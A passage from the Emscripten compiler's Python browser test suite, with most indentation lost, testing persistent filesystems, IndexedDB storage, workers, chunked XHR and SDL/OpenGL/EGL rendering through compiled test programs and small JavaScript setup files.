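  # `secret`, the second reads it back with only -sFORCE_FILESYSTEM, and the third shows the
  # persisted value winning over a conflicting --preload-file (inferred from the flags and
  # the inline comment; the actual persistence logic lives in file_db.cpp).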
def test_file_db(self):
secret = str(time.time())
create_file('moar.txt', secret)
self.btest('file_db.cpp', '1', args=['--preload-file', 'moar.txt', '-DFIRST'])
shutil.copyfile('test.html', 'first.html')
self.btest('file_db.cpp', secret, args=['-sFORCE_FILESYSTEM'])
shutil.copyfile('test.html', 'second.html')
create_file('moar.txt', 'aliantha')
self.btest('file_db.cpp', secret, args=['--preload-file', 'moar.txt']) # even with a file there, we load over it
shutil.move('test.html', 'third.html')
def test_fs_idbfs_sync(self):
for extra in [[], ['-DEXTRA_WORK']]:
secret = str(time.time())
self.btest(test_file('fs/test_idbfs_sync.c'), '1', args=['-lidbfs.js', '-DFIRST', '-DSECRET=\"' + secret + '\"', '-sEXPORTED_FUNCTIONS=_main,_test,_success', '-lidbfs.js'])
self.btest(test_file('fs/test_idbfs_sync.c'), '1', args=['-lidbfs.js', '-DSECRET=\"' + secret + '\"', '-sEXPORTED_FUNCTIONS=_main,_test,_success', '-lidbfs.js'] + extra)
def test_fs_idbfs_sync_force_exit(self):
secret = str(time.time())
self.btest(test_file('fs/test_idbfs_sync.c'), '1', args=['-lidbfs.js', '-DFIRST', '-DSECRET=\"' + secret + '\"', '-sEXPORTED_FUNCTIONS=_main,_test,_success', '-sEXIT_RUNTIME', '-DFORCE_EXIT', '-lidbfs.js'])
self.btest(test_file('fs/test_idbfs_sync.c'), '1', args=['-lidbfs.js', '-DSECRET=\"' + secret + '\"', '-sEXPORTED_FUNCTIONS=_main,_test,_success', '-sEXIT_RUNTIME', '-DFORCE_EXIT', '-lidbfs.js'])
def test_fs_idbfs_fsync(self):
# sync from persisted state into memory before main()
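    # The pre.js below registers a run dependency, mounts IDBFS at /working1 and calls
    # FS.syncfs(true, ...) to pull any previously persisted IndexedDB state into the
    # in-memory filesystem; only once that completes is the dependency removed and main()
    # allowed to run.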
create_file('pre.js', '''
Module.preRun = function() {
addRunDependency('syncfs');
FS.mkdir('/working1');
FS.mount(IDBFS, {}, '/working1');
FS.syncfs(true, function (err) {
if (err) throw err;
removeRunDependency('syncfs');
});
};
''')
args = ['--pre-js', 'pre.js', '-lidbfs.js', '-sEXIT_RUNTIME', '-sASYNCIFY']
secret = str(time.time())
self.btest(test_file('fs/test_idbfs_fsync.c'), '1', args=args + ['-DFIRST', '-DSECRET=\"' + secret + '\"', '-sEXPORTED_FUNCTIONS=_main,_success', '-lidbfs.js'])
self.btest(test_file('fs/test_idbfs_fsync.c'), '1', args=args + ['-DSECRET=\"' + secret + '\"', '-sEXPORTED_FUNCTIONS=_main,_success', '-lidbfs.js'])
def test_fs_memfs_fsync(self):
args = ['-sASYNCIFY', '-sEXIT_RUNTIME']
secret = str(time.time())
self.btest(test_file('fs/test_memfs_fsync.c'), '1', args=args + ['-DSECRET=\"' + secret + '\"'])
def test_fs_workerfs_read(self):
secret = 'a' * 10
secret2 = 'b' * 10
create_file('pre.js', '''
var Module = {};
Module.preRun = function() {
var blob = new Blob(['%s']);
var file = new File(['%s'], 'file.txt');
FS.mkdir('/work');
FS.mount(WORKERFS, {
blobs: [{ name: 'blob.txt', data: blob }],
files: [file],
}, '/work');
};
''' % (secret, secret2))
self.btest(test_file('fs/test_workerfs_read.c'), '1', args=['-lworkerfs.js', '--pre-js', 'pre.js', '-DSECRET=\"' + secret + '\"', '-DSECRET2=\"' + secret2 + '\"', '--proxy-to-worker', '-lworkerfs.js'])
def test_fs_workerfs_package(self):
create_file('file1.txt', 'first')
ensure_dir('sub')
create_file('sub/file2.txt', 'second')
self.run_process([FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', Path('sub/file2.txt'), '--separate-metadata', '--js-output=files.js'])
self.btest(Path('fs/test_workerfs_package.cpp'), '1', args=['-lworkerfs.js', '--proxy-to-worker', '-lworkerfs.js'])
def test_fs_lz4fs_package(self):
# generate data
ensure_dir('subdir')
create_file('file1.txt', '0123456789' * (1024 * 128))
create_file('subdir/file2.txt', '1234567890' * (1024 * 128))
random_data = bytearray(random.randint(0, 255) for x in range(1024 * 128 * 10 + 1))
random_data[17] = ord('X')
create_file('file3.txt', random_data, binary=True)
    # compress at emcc link time: -sLZ4 tells emcc to have the file packager LZ4-compress the preloaded files
print('emcc-normal')
self.btest(Path('fs/test_lz4fs.cpp'), '2', args=['-sLZ4=1', '--preload-file', 'file1.txt', '--preload-file', 'subdir/file2.txt', '--preload-file', 'file3.txt'])
assert os.path.getsize('file1.txt') + os.path.getsize(Path('subdir/file2.txt')) + os.path.getsize('file3.txt') == 3 * 1024 * 128 * 10 + 1
assert os.path.getsize('test.data') < (3 * 1024 * 128 * 10) / 2 # over half is gone
print(' emcc-opts')
self.btest(Path('fs/test_lz4fs.cpp'), '2', args=['-sLZ4=1', '--preload-file', 'file1.txt', '--preload-file', 'subdir/file2.txt', '--preload-file', 'file3.txt', '-O2'])
# compress in the file packager, on the server. the client receives compressed data and can just use it. this is typical usage
print('normal')
out = subprocess.check_output([FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', 'subdir/file2.txt', 'file3.txt', '--lz4'])
create_file('files.js', out, binary=True)
self.btest(Path('fs/test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js', '-sLZ4=1', '-sFORCE_FILESYSTEM'])
print(' opts')
self.btest(Path('fs/test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js', '-sLZ4=1', '-sFORCE_FILESYSTEM', '-O2'])
print(' modularize')
self.compile_btest([test_file('fs/test_lz4fs.cpp'), '--pre-js', 'files.js', '-sLZ4=1', '-sFORCE_FILESYSTEM', '-sMODULARIZE=1'])
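    # With -sMODULARIZE the generated JS exports a factory function (named Module by default)
    # instead of running on load, so the hand-written page below has to call Module() itself
    # to instantiate and start the program.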
create_file('a.html', '''
<script src="a.out.js"></script>
<script>
Module()
</script>
''')
self.run_browser('a.html', '.', '/report_result?2')
# load the data into LZ4FS manually at runtime. This means we compress on the client. This is generally not recommended
print('manual')
subprocess.check_output([FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', 'subdir/file2.txt', 'file3.txt', '--separate-metadata', '--js-output=files.js'])
self.btest(Path('fs/test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-sLZ4=1', '-sFORCE_FILESYSTEM'])
print(' opts')
self.btest(Path('fs/test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-sLZ4=1', '-sFORCE_FILESYSTEM', '-O2'])
print(' opts+closure')
self.btest(Path('fs/test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-sLZ4=1', '-sFORCE_FILESYSTEM', '-O2', '--closure=1', '-g1', '-sCLOSURE_WARNINGS=quiet'])
'''# non-lz4 for comparison
try:
os.mkdir('files')
except OSError:
pass
shutil.copyfile('file1.txt', Path('files/file1.txt'))
shutil.copyfile('file2.txt', Path('files/file2.txt'))
shutil.copyfile('file3.txt', Path('files/file3.txt'))
out = subprocess.check_output([FILE_PACKAGER, 'files.data', '--preload', 'files/file1.txt', 'files/file2.txt', 'files/file3.txt'])
create_file('files.js', out, binary=True)
self.btest(Path('fs/test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js'])'''
def test_separate_metadata_later(self):
# see issue #6654 - we need to handle separate-metadata both when we run before
# the main program, and when we are run later
create_file('data.dat', ' ')
self.run_process([FILE_PACKAGER, 'more.data', '--preload', 'data.dat', '--separate-metadata', '--js-output=more.js'])
self.btest(Path('browser/separate_metadata_later.cpp'), '1', args=['-sFORCE_FILESYSTEM'])
def test_idbstore(self):
secret = str(time.time())
for stage in [0, 1, 2, 3, 0, 1, 2, 0, 0, 1, 4, 2, 5]:
self.clear()
print(stage)
self.btest_exit(test_file('idbstore.c'), args=['-lidbstore.js', '-DSTAGE=' + str(stage), '-DSECRET=\"' + secret + '\"'])
def test_idbstore_sync(self):
secret = str(time.time())
self.clear()
self.btest(test_file('idbstore_sync.c'), '6', args=['-lidbstore.js', '-DSECRET=\"' + secret + '\"', '--memory-init-file', '1', '-O3', '-g2', '-sASYNCIFY'])
def test_idbstore_sync_worker(self):
secret = str(time.time())
self.btest(test_file('idbstore_sync_worker.c'), expected='0', args=['-lidbstore.js', '-DSECRET=\"' + secret + '\"', '--memory-init-file', '1', '-O3', '-g2', '--proxy-to-worker', '-sINITIAL_MEMORY=80MB', '-sASYNCIFY'])
def test_force_exit(self):
self.btest_exit('force_exit.c', assert_returncode=10)
def test_sdl_pumpevents(self):
# key events should be detected using SDL_PumpEvents
create_file('pre.js', '''
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
''')
self.btest_exit('sdl_pumpevents.c', assert_returncode=7, args=['--pre-js', 'pre.js', '-lSDL', '-lGL'])
def test_sdl_canvas_size(self):
self.btest_exit('sdl_canvas_size.c',
args=['-O2', '--minify=0', '--shell-file',
test_file('sdl_canvas_size.html'), '-lSDL', '-lGL'])
@requires_graphics_hardware
def test_sdl_gl_read(self):
# SDL, OpenGL, readPixels
self.compile_btest([test_file('sdl_gl_read.c'), '-o', 'something.html', '-lSDL', '-lGL'])
self.run_browser('something.html', '.', '/report_result?1')
@requires_graphics_hardware
def test_sdl_gl_mapbuffers(self):
self.btest('sdl_gl_mapbuffers.c', expected='1', args=['-sFULL_ES3=1', '-lSDL', '-lGL'],
message='You should see a blue triangle.')
@requires_graphics_hardware
def test_sdl_ogl(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '--minify=0', '--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_regal(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '--minify=0', '--preload-file', 'screenshot.png', '-sUSE_REGAL', '-DUSE_REGAL', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_defaultmatrixmode(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl_defaultMatrixMode.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['--minify=0', '--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_p(self):
# Immediate mode with pointers
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl_p.c', reference='screenshot-gray.png', reference_slack=1,
args=['--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_proc_alias(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl_proc_alias.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '-g2', '-sINLINING_LIMIT', '--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'])
@requires_graphics_hardware
def test_sdl_fog_simple(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_simple.c', reference='screenshot-fog-simple.png',
args=['-O2', '--minify=0', '--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_negative(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_negative.c', reference='screenshot-fog-negative.png',
args=['--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_density(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_density.c', reference='screenshot-fog-density.png',
args=['--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_exp2(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_exp2.c', reference='screenshot-fog-exp2.png',
args=['--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_linear(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_linear.c', reference='screenshot-fog-linear.png', reference_slack=1,
args=['--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_glfw(self):
self.btest_exit('glfw.c', args=['-sLEGACY_GL_EMULATION', '-lglfw', '-lGL'])
self.btest_exit('glfw.c', args=['-sLEGACY_GL_EMULATION', '-sUSE_GLFW=2', '-lglfw', '-lGL'])
def test_glfw_minimal(self):
self.btest_exit('glfw_minimal.c', args=['-lglfw', '-lGL'])
self.btest_exit('glfw_minimal.c', args=['-sUSE_GLFW=2', '-lglfw', '-lGL'])
def test_glfw_time(self):
self.btest_exit('test_glfw_time.c', args=['-sUSE_GLFW=3', '-lglfw', '-lGL'])
def _test_egl_base(self, *args):
self.btest_exit(test_file('test_egl.c'), args=['-O2', '-lEGL', '-lGL'] + list(args))
@requires_graphics_hardware
def test_egl(self):
self._test_egl_base()
@requires_threads
@requires_graphics_hardware
def test_egl_with_proxy_to_pthread(self):
self._test_egl_base('-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-sOFFSCREEN_FRAMEBUFFER')
def _test_egl_width_height_base(self, *args):
self.btest_exit(test_file('test_egl_width_height.c'), args=['-O2', '-lEGL', '-lGL'] + list(args))
def test_egl_width_height(self):
self._test_egl_width_height_base()
@requires_threads
def test_egl_width_height_with_proxy_to_pthread(self):
self._test_egl_width_height_base('-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD')
@requires_graphics_hardware
def test_egl_createcontext_error(self):
self.btest_exit('test_egl_createcontext_error.c', args=['-lEGL', '-lGL'])
def test_worker(self):
# Test running in a web worker
create_file('file.dat', 'data for worker')
create_file('main.html', '''
<html>
<body>
Worker Test
<script>
var worker = new Worker('worker.js');
worker.onmessage = function(event) {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?' + event.data);
xhr.send();
setTimeout(function() { window.close() }, 1000);
};
</script>
</body>
</html>
''' % self.port)
for file_data in [1, 0]:
cmd = [EMCC, test_file('hello_world_worker.cpp'), '-o', 'worker.js'] + (['--preload-file', 'file.dat'] if file_data else [])
print(cmd)
self.run_process(cmd)
self.assertExists('worker.js')
self.run_browser('main.html', '', '/report_result?hello from worker, and :' + ('data for w' if file_data else '') + ':')
self.assertContained('you should not see this text when in a worker!', self.run_js('worker.js')) # code should run standalone too
def test_mmap_lazyfile(self):
create_file('lazydata.dat', 'hello world')
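    # FS.createLazyFile in the pre.js below registers a file whose contents are fetched on
    # demand (via XHR) rather than preloaded; that lazily-backed file is what
    # test_mmap_lazyfile.c then mmaps.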
create_file('pre.js', '''
Module["preInit"] = () => {
FS.createLazyFile('/', "lazy.txt", "lazydata.dat", true, false);
}
''')
self.emcc_args += ['--pre-js=pre.js', '--proxy-to-worker']
self.btest_exit(test_file('test_mmap_lazyfile.c'))
@no_firefox('keeps sending OPTIONS requests, and eventually errors')
def test_chunked_synchronous_xhr(self):
main = 'chunked_sync_xhr.html'
worker_filename = "download_and_checksum_worker.js"
create_file(main, r"""
<!doctype html>
<html>
<head><meta charset="utf-8"><title>Chunked XHR</title></head>
<body>
Chunked XHR Web Worker Test
<script>
var worker = new Worker(""" + json.dumps(worker_filename) + r""");
var buffer = [];
worker.onmessage = function(event) {
if (event.data.channel === "stdout") {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?' + event.data.line);
xhr.send();
setTimeout(function() { window.close() }, 1000);
} else {
if (event.data.trace) event.data.trace.split("\n").map(function(v) { console.error(v); });
if (event.data.line) {
console.error(event.data.line);
} else {
var v = event.data.char;
if (v == 10) {
var line = buffer.splice(0);
console.error(line = line.map(function(charCode){return String.fromCharCode(charCode);}).join(''));
} else {
buffer.push(v);
}
}
}
};
</script>
</body>
</html>
""" % self.port)
create_file('worker_prejs.js', r"""
if (typeof(Module) === "undefined") Module = {};
Module["arguments"] = ["/bigfile"];
Module["preInit"] = function() {
FS.createLazyFile('/', "bigfile", "http://localhost:11111/bogus_file_path", true, false);
};
var doTrace = true;
Module["print"] = function(s) { self.postMessage({channel: "stdout", line: s}); };
Module["printErr"] = function(s) { self.postMessage({channel: "stderr", char: s, trace: ((doTrace && s === 10) ? new Error().stack : null)}); doTrace = false; };
""")
# vs. os.path.join(self.get_dir(), filename)
# vs. test_file('hello_world_gles.c')
self.compile_btest([test_file('checksummer.c'), '-g', '-sSMALL_XHR_CHUNKS', '-o', worker_filename,
'--pre-js', 'worker_prejs.js'])
chunkSize = 1024
data = os.urandom(10 * chunkSize + 1) # 10 full chunks and one 1 byte chunk
checksum = zlib.adler32(data) & 0xffffffff # Python 2 compatibility: force bigint
server = multiprocessing.Process(target=test_chunked_synchronous_xhr_server, args=(True, chunkSize, data, checksum, self.port))
server.start()
# block until the server is actually ready
    for _ in range(60):
      try:
        urlopen('http://localhost:11111')
        break
      except Exception:
        print('(sleep for server)')
        time.sleep(1)
    else:
      # the loop never hit `break`, so the server never became ready
      raise Exception('chunked XHR test server did not become ready in time')
try:
self.run_browser(main, 'Chunked binary synchronous XHR in Web Workers!', '/report_result?' + str(checksum))
finally:
server.terminate()
      # Avoid a race condition on cleanup: wait a bit so that processes have released their
      # file locks and the test's tearDown won't attempt to rmdir() files that are still in use.
if WINDOWS:
time.sleep(2)
@requires_graphics_hardware
def test_glgears(self, extra_args=[]):
self.btest('hello_world_gles.c', reference='gears.png', reference_slack=3,
args=['-DHAVE_BUILTIN_SINCOS', '-lGL', '-lglut'] + extra_args)
@requires_graphics_hardware
@requires_threads
def test_glgears_pthreads(self, extra_args=[]):
    # test that a program that doesn't use pthreads still works with pthreads enabled
# (regression test for https://github.com/emscripten-core/emscripten/pull/8059#issuecomment-488105672)
self.test_glgears(['-sUSE_PTHREADS'])
@requires_graphics_hardware
@parameterized({
'': ([False],),
    # also run the test proxied to a worker
'proxy': ([True],)
})
def test_glgears_long(self, proxy):
args = ['-DHAVE_BUILTIN_SINCOS', '-DLONGTEST', '-lGL', '-lglut', '-DANIMATE']
if proxy:
args += ['--proxy-to-worker']
self.btest('hello_world_gles.c', expected='0', args=args)
@requires_graphics_hardware
def test_glgears_animation(self):
for filename in ['hello_world_gles.c', 'hello_world_gles_full.c', 'hello_world_gles_full_944.c']:
print(filename)
cmd = [test_file(filename), '-o', 'something.html',
'-DHAVE_BUILTIN_SINCOS', '-sGL_TESTING', '-lGL', '-lglut',
'--shell-file', test_file('hello_world_gles_shell.html')]
if 'full' in filename:
cmd += ['-sFULL_ES2=1']
self.compile_btest(cmd)
self.run_browser('something.html', 'You should see animating gears.', '/report_gl_result?true')
@requires_graphics_hardware
def test_fulles2_sdlproc(self):
self.btest_exit('full_es2_sdlproc.c', assert_returncode=1, args=['-sGL_TESTING', '-DHAVE_BUILTIN_SINCOS', '-sFULL_ES2', '-lGL', '-lSDL', '-lglut'])
@requires_graphics_hardware
def test_glgears_deriv(self):
self.btest('hello_world_gles_deriv.c', reference='gears.png', reference_slack=2,
args=['-DHAVE_BUILTIN_SINCOS', '-lGL', '-lglut'],
message='You should see animating gears.')
assert 'gl-matrix' not in read_file('test.html'), 'Should not include glMatrix when not needed'
@requires_graphics_hardware
def test_glbook(self):
self.emcc_args.remove('-Werror')
programs = self.get_library('third_party/glbook', [
Path('Chapter_2/Hello_Triangle', 'CH02_HelloTriangle.o'),
Path('Chapter_8/Simple_VertexShader', 'CH08_SimpleVertexShader.o'),
Path('Chapter_9/Simple_Texture2D', 'CH09_SimpleTexture2D.o'),
Path('Chapter_9/Simple_TextureCubemap', 'CH09_TextureCubemap.o'),
Path('Chapter_9/TextureWrap', 'CH09_TextureWrap.o'),
Path('Chapter_10/MultiTexture', 'CH10_MultiTexture.o'),
Path('Chapter_13/ParticleSystem', 'CH13_ParticleSystem.o'),
], configure=None)
def book_path(*pathelems):
return test_file('third_party/glbook', *pathelems)
for program in programs:
print(program)
basename = os.path.basename(program)
args = ['-lGL', '-lEGL', '-lX11']
if basename == 'CH10_MultiTexture.o':
shutil.copyfile(book_path('Chapter_10', 'MultiTexture', 'basemap.tga'), 'basemap.tga')
shutil.copyfile(book_path('Chapter_10', 'MultiTexture', 'lightmap.tga'), 'lightmap.tga')
args += ['--preload-file', 'basemap.tga', '--preload-file', 'lightmap.tga']
elif basename == 'CH13_ParticleSystem.o':
shutil.copyfile(book_path('Chapter_13', 'ParticleSystem', 'smoke.tga'), 'smoke.tga')
args += ['--preload-file', 'smoke.tga', '-O2'] # test optimizations and closure here as well for more coverage
self.btest(program,
reference=book_path(basename.replace('.o', '.png')),
args=args)
@requires_graphics_hardware
@parameterized({
'normal': (['-sFULL_ES2=1'],),
# Enabling FULL_ES3 also enables ES2 automatically
'full_es3': (['-sFULL_ES3=1'],)
})
def test_gles2_emulation(self, args):
print(args)
shutil.copyfile(test_file('third_party/glbook/Chapter_10/MultiTexture/basemap.tga'), 'basemap.tga')
shutil.copyfile(test_file('third_party/glbook/Chapter_10/MultiTexture/lightmap.tga'), 'lightmap.tga')
shutil.copyfile(test_file('third_party/glbook/Chapter_13/ParticleSystem/smoke.tga'), 'smoke.tga')
for source, reference in [
(Path('third_party/glbook/Chapter_2', 'Hello_Triangle', 'Hello_Triangle_orig.c'), test_file('third_party/glbook/CH02_HelloTriangle.png')),
# (Path('third_party/glbook/Chapter_8', 'Simple_VertexShader', 'Simple_VertexShader_orig.c'), test_file('third_party/glbook/CH08_SimpleVertexShader.png')), # XXX needs INT extension in WebGL
(Path('third_party/glbook/Chapter_9', 'TextureWrap', 'TextureWrap_orig.c'), test_file('third_party/glbook/CH09_TextureWrap.png')),
# (Path('third_party/glbook/Chapter_9', 'Simple_TextureCubemap', 'Simple_TextureCubemap_orig.c'), test_file('third_party/glbook/CH09_TextureCubemap.png')), # XXX needs INT extension in WebGL
(Path('third_party/glbook/Chapter_9', 'Simple_Texture2D', 'Simple_Texture2D_orig.c'), test_file('third_party/glbook/CH09_SimpleTexture2D.png')),
(Path('third_party/glbook/Chapter_10', 'MultiTexture', 'MultiTexture_orig.c'), test_file('third_party/glbook/CH10_MultiTexture.png')),
(Path('third_party/glbook/Chapter_13', 'ParticleSystem', 'ParticleSystem_orig.c'), test_file('third_party/glbook/CH13_ParticleSystem.png')),
]:
print(source)
self.btest(source,
reference=reference,
args=['-I' + test_file('third_party/glbook/Common'),
test_file('third_party/glbook/Common/esUtil.c'),
test_file('third_party/glbook/Common/esShader.c'),
test_file('third_party/glbook/Common/esShapes.c'),
test_file('third_party/glbook/Common/esTransform.c'),
'-lGL', '-lEGL', '-lX11',
'--preload-file', 'basemap.tga', '--preload-file', 'lightmap.tga', '--preload-file', 'smoke.tga'] + args)
@requires_graphics_hardware
def test_clientside_vertex_arrays_es3(self):
self.btest('clientside_vertex_arrays_es3.c', reference='gl_triangle.png', args=['-sFULL_ES3=1', '-sUSE_GLFW=3', '-lglfw', '-lGLESv2'])
def test_emscripten_api(self):
self.btest_exit('emscripten_api_browser.c', args=['-sEXPORTED_FUNCTIONS=_main,_third', '-lSDL'])
def test_emscripten_api2(self):
def setup():
create_file('script1.js', '''
Module._set(456);
''')
create_file('file1.txt', 'first')
create_file('file2.txt', 'second')
setup()
self.run_process([FILE_PACKAGER, 'test.data', '--preload', 'file1.txt', 'file2.txt'], stdout=open('script2.js', 'w'))
self.btest_exit('emscripten_api_browser2.c', args=['-sEXPORTED_FUNCTIONS=_main,_set', '-sFORCE_FILESYSTEM'])
# check using file packager to another dir
self.clear()
setup()
ensure_dir('sub')
self.run_process([FILE_PACKAGER, 'sub/test.data', '--preload', 'file1.txt', 'file2.txt'], stdout=open('script2.js', 'w'))
shutil.copyfile(Path('sub/test.data'), 'test.data')
self.btest_exit('emscripten_api_browser2.c', args=['-sEXPORTED_FUNCTIONS=_main,_set', '-sFORCE_FILESYSTEM'])
def test_emscripten_api_infloop(self):
self.btest_exit('emscripten_api_browser_infloop.cpp', assert_returncode=7)
def test_emscripten_fs_api(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png') # preloaded *after* run
self.btest_exit('emscripten_fs_api_browser.c', assert_returncode=1, args=['-lSDL'])
def test_emscripten_fs_api2(self):
    self.btest_exit('emscripten_fs_api_browser2.c', assert_returncode=1, args=['-sASSERTIONS=0'])
    self.btest_exit('emscripten_fs_api_browser2.c', assert_returncode=1, args=['-sASSERTIONS=1'])
@requires_threads
def test_emscripten_main_loop(self):
for args in [[], ['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-sEXIT_RUNTIME']]:
self.btest_exit('emscripten_main_loop.cpp', args=args)
@parameterized({
'': ([],),
# test pthreads + AUTO_JS_LIBRARIES mode as well
'pthreads': (['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-sAUTO_JS_LIBRARIES=0'],),
})
@requires_threads
def test_emscripten_main_loop_settimeout(self, args):
self.btest_exit('emscripten_main_loop_settimeout.cpp', args=args)
@parameterized({
'': ([],),
'pthreads': (['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'],),
})
@requires_threads
def test_emscripten_main_loop_and_blocker(self, args):
self.btest_exit('emscripten_main_loop_and_blocker.cpp', args=args)
@requires_threads
def test_emscripten_main_loop_and_blocker_exit(self):
# Same as above but tests that EXIT_RUNTIME works with emscripten_main_loop. The
# app should still stay alive until the loop ends
self.btest_exit('emscripten_main_loop_and_blocker.cpp')
@parameterized({
'': ([],),
'worker': (['--proxy-to-worker'],),
'pthreads': (['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'],)
})
@requires_threads
def test_emscripten_main_loop_setimmediate(self, args):
self.btest_exit('emscripten_main_loop_setimmediate.cpp', args=args)
def test_fs_after_main(self):
for args in [[], ['-O1']]:
self.btest('fs_after_main.cpp', '0', args=args)
def test_sdl_quit(self):
self.btest_exit('sdl_quit.c', args=['-lSDL', '-lGL'])
def test_sdl_resize(self):
# FIXME(https://github.com/emscripten-core/emscripten/issues/12978)
self.emcc_args.append('-Wno-deprecated-declarations')
self.btest('sdl_resize.c', '1', args=['-lSDL', '-lGL'])
def test_glshaderinfo(self):
self.btest('glshaderinfo.cpp', '1', args=['-lGL', '-lglut'])
@requires_graphics_hardware
def test_glgetattachedshaders(self):
self.btest('glgetattachedshaders.c', '1', args=['-lGL', '-lEGL'])
  # Covered by the dEQP test suite (we can remove it later if we add coverage for that).
@requires_graphics_hardware
def test_glframebufferattachmentinfo(self):
self.btest('glframebufferattachmentinfo.c', '1', args=['-lGLESv2', '-lEGL'])
@requires_graphics_hardware
def test_sdlglshader(self):
self.btest('sdlglshader.c', reference='sdlglshader.png', args=['-O2', '--closure=1', '-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_sdlglshader2(self):
self.btest_exit('sdlglshader2.c', args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_gl_glteximage(self):
self.btest('gl_teximage.c', '1', args=['-lGL', '-lSDL'])
@parameterized({
'': ([],),
'pthreads': (['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-sOFFSCREEN_FRAMEBUFFER'],),
})
@requires_graphics_hardware
@requires_threads
def test_gl_textures(self, args):
self.btest('gl_textures.cpp', '0', args=['-lGL'] + args)
@requires_graphics_hardware
def test_gl_ps(self):
# pointers and a shader
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('gl_ps.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1)
@requires_graphics_hardware
def test_gl_ps_packed(self):
# packed data that needs to be strided
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('gl_ps_packed.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1)
@requires_graphics_hardware
def test_gl_ps_strides(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('gl_ps_strides.c', reference='gl_ps_strides.png', args=['--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '-lGL', '-lSDL', '--use-preload-plugins'])
@requires_graphics_hardware
def test_gl_ps_worker(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('gl_ps_worker.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1, also_proxied=True)
@requires_graphics_hardware
def test_gl_renderers(self):
self.btest('gl_renderers.c', reference='gl_renderers.png', args=['-sGL_UNSAFE_OPTS=0', '-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
